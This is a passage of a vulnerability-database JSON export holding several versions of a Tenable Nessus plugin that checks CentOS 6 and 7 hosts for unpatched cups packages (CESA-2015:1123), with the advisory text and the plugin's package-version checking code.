script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "CentOS 6 / 7 : cups (CESA-2015:1123)", "type": "nessus", "viewCount": 8}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-03T10:04:45"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:cups-libs", "p-cpe:/a:centos:centos:cups-php", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:cups", "p-cpe:/a:centos:centos:cups-ipptool", "p-cpe:/a:centos:centos:cups-client", "p-cpe:/a:centos:centos:cups-lpd", "p-cpe:/a:centos:centos:cups-filesystem", "p-cpe:/a:centos:centos:cups-devel"], "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated cups packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the cupsd daemon will be restarted automatically.", "edition": 2, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "c51e9aa8bc2355be7400291b1665d2b80aeb0fb77a417999641030cab737eb76", "hashmap": [{"hash": "9fe7fac5643c2de42bab95a37df308be", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "42a303b6c8ee4f399e2b408d8aa372af", "key": "description"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "883afaca71e4c27b13b077c8f0d80806", "key": "href"}, {"hash": "52b779c6cb4db7f4867db45da7a5d907", "key": "pluginID"}, {"hash": "212e625ef8cc5028a93a91290153dca0", "key": "references"}, {"hash": "13f4c3ea99a9d71a729f1d00e5b614d9", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "20a3b22f38036d445be91ac3db867352", "key": "cvelist"}, {"hash": "164a4115e940e28685331ff6cf8244a3", "key": "title"}, {"hash": "1c6c46af46e03c23b443748a84d485a0", "key": "sourceData"}, {"hash": "c5bff0491c78f8e2241f90164d8cbe6f", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=84276", "id": "CENTOS_RHSA-2015-1123.NASL", "lastseen": "2017-10-29T13:41:16", "modified": "2016-05-04T00:00:00", "naslFamily": "CentOS Local Security Checks", "objectVersion": "1.3", "pluginID": "84276", "published": "2015-06-19T00:00:00", "references": ["http://www.nessus.org/u?96f7741b", "http://www.nessus.org/u?3ed2b6f9"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1123 and \n# CentOS Errata and Security Advisory 2015:1123 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84276);\n script_version(\"$Revision: 2.6 $\");\n script_cvs_date(\"$Date: 2016/05/04 14:39:53 $\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_osvdb_id(118237, 123116, 123117);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"CentOS 6 / 7 : cups (CESA-2015:1123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-June/021178.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ed2b6f9\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-June/021179.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?96f7741b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "CentOS 6 / 7 : cups (CESA-2015:1123)", "type": "nessus", "viewCount": 5}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:41:16"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated cups packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the cupsd daemon will be restarted automatically.", "edition": 1, "enchantments": {}, "hash": "7c287efedcb1befac61fb319ecd09218273f419783b1eb80af9804286985f47d", "hashmap": [{"hash": "9fe7fac5643c2de42bab95a37df308be", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "42a303b6c8ee4f399e2b408d8aa372af", "key": "description"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "883afaca71e4c27b13b077c8f0d80806", "key": "href"}, {"hash": "52b779c6cb4db7f4867db45da7a5d907", "key": "pluginID"}, {"hash": "212e625ef8cc5028a93a91290153dca0", "key": "references"}, {"hash": "13f4c3ea99a9d71a729f1d00e5b614d9", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "20a3b22f38036d445be91ac3db867352", "key": "cvelist"}, {"hash": "164a4115e940e28685331ff6cf8244a3", "key": "title"}, {"hash": "1c6c46af46e03c23b443748a84d485a0", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=84276", "id": "CENTOS_RHSA-2015-1123.NASL", "lastseen": "2016-09-26T17:25:29", "modified": "2016-05-04T00:00:00", "naslFamily": "CentOS Local Security Checks", "objectVersion": "1.2", "pluginID": "84276", "published": "2015-06-19T00:00:00", "references": ["http://www.nessus.org/u?96f7741b", "http://www.nessus.org/u?3ed2b6f9"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1123 and \n# CentOS Errata and Security Advisory 2015:1123 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84276);\n script_version(\"$Revision: 2.6 $\");\n script_cvs_date(\"$Date: 2016/05/04 14:39:53 $\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_osvdb_id(118237, 123116, 123117);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"CentOS 6 / 7 : cups (CESA-2015:1123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-June/021178.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ed2b6f9\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2015-June/021179.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?96f7741b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cups packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-ipptool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-lpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:cups-php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2016 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-devel-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-libs-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-lpd-1.4.2-67.el6_6.1\")) flag++;\nif (rpm_check(release:\"CentOS-6\", reference:\"cups-php-1.4.2-67.el6_6.1\")) flag++;\n\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-client-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-devel-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-filesystem-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-ipptool-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-libs-1.6.3-17.el7_1.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"cups-lpd-1.6.3-17.el7_1.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "title": "CentOS 6 / 7 : cups (CESA-2015:1123)", "type": "nessus", "viewCount": 1}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:25:29"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:centos:centos:6", "p-cpe:/a:centos:centos:cups-libs", "p-cpe:/a:centos:centos:cups-php", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:cups", "p-cpe:/a:centos:centos:cups-ipptool", "p-cpe:/a:centos:centos:cups-client", "p-cpe:/a:centos:centos:cups-lpd", "p-cpe:/a:centos:centos:cups-filesystem", "p-cpe:/a:centos:centos:cups-devel"], "cvelist": ["CVE-2014-9679", "CVE-2015-1158", "CVE-2015-1159"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated cups packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar operating systems.\n\nA string reference count bug was found in cupsd, causing premature freeing of string objects. An attacker can submit a malicious print job that exploits this flaw to dismantle ACLs protecting privileged operations, allowing a replacement configuration file to be uploaded which in turn allows the attacker to run arbitrary code in the CUPS server (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating engine. An attacker could use this flaw to bypass the default configuration settings that bind the CUPS scheduler to the 'localhost' or loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found in the way cups handled compressed raster image files. An attacker could create a specially crafted image file, which when passed via the cups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158 and CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the cupsd daemon will be restarted automatically.", "edition": 6, "enchantments": {"score": {"value": 6.8, "vector": "NONE"}}, "hash": "5f7aca936901d39465c073ce974ba202770c8ddad620b509df599d10b4fcd87f", "hashmap": [{"hash": "9fe7fac5643c2de42bab95a37df308be", "key": "published"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "42a303b6c8ee4f399e2b408d8aa372af", "key": "description"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "8f8213e8b86855939d5beea715ce3045", "key": "naslFamily"}, {"hash": "883afaca71e4c27b13b077c8f0d80806", "key": "href"}, {"hash": "52b779c6cb4db7f4867db45da7a5d907", "key": "pluginID"}, {"hash": "212e625ef8cc5028a93a91290153dca0", "key": "references"}, {"hash": "e0dcfe84c744bb8eb47e33589cc92f3b", "key": "sourceData"}, {"hash": "28c8e8fb0a1a6b2926bc5fd729ee5bd4", "key": "modified"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "20a3b22f38036d445be91ac3db867352", "key": "cvelist"}, {"hash": "164a4115e940e28685331ff6cf8244a3", "key": "title"}, {"hash": "c5bff0491c78f8e2241f90164d8cbe6f", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=84276", "id": "CENTOS_RHSA-2015-1123.NASL", "lastseen": "2018-11-11T08:35:25", "modified": "2018-07-02T00:00:00", "naslFamily": "CentOS Local Security Checks", "objectVersion": "1.3", "pluginID": "84276", "published": "2015-06-19T00:00:00", "references": ["http://www.nessus.org/u?96f7741b", "http://www.nessus.org/u?3ed2b6f9"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1123 and \n# CentOS Errata and Security Advisory 2015:1123 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84276);\n script_version(\"2.8\");\n script_cvs_date(\"Date: 2018/11/10 11:49:31\");\n\n script_cve_id(\"CVE-2014-9679\", \"CVE-2015-1158\", \"CVE-2015-1159\");\n script_bugtraq_id(72594, 75098, 75106);\n script_xref(name:\"RHSA\", value:\"2015:1123\");\n\n script_name(english:\"CentOS 6 / 7 : cups (CESA-2015:1123)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated cups packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6 and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nCUPS provides a portable printing layer for Linux, UNIX, and similar\noperating systems.\n\nA string reference count bug was found in cupsd, causing premature\nfreeing of string objects. An attacker can submit a malicious print\njob that exploits this flaw to dismantle ACLs protecting privileged\noperations, allowing a replacement configuration file to be uploaded\nwhich in turn allows the attacker to run arbitrary code in the CUPS\nserver (CVE-2015-1158)\n\nA cross-site scripting flaw was found in the cups web templating\nengine. An attacker could use this flaw to bypass the default\nconfiguration settings that bind the CUPS scheduler to the 'localhost'\nor loopback interface. (CVE-2015-1159)\n\nAn integer overflow leading to a heap-based buffer overflow was found\nin the way cups handled compressed raster image files. An attacker\ncould create a specially crafted image file, which when passed via the\ncups Raster filter, could cause the cups filter to crash.\n(CVE-2014-9679)\n\nRed Hat would like to thank the CERT/CC for reporting CVE-2015-1158\nand CVE-2015-1159 issues.\n\nAll cups users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthis update, the cupsd daemon will be restarted automatically.\"\n );\n # 